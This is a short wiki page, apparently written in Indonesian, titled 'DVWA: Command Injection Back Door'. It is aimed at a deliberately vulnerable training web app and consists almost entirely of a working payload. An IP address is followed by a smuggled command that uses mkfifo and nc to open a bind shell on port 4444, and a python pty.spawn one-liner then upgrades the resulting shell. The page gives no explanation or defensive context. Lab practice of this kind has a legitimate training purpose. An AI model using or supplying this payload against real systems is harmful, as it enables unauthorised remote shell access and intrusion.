DVWA: Command Injection Back Door
Revision as of 13:34, 15 October 2018 by Onnowpurbo (talk | contribs) (Created page with " 192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe Untuk dapet shell ketik python -c 'import pty; pty.spawn("/bin/sh")'")
192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Untuk dapet shell ketik
python -c 'import pty; pty.spawn("/bin/sh")'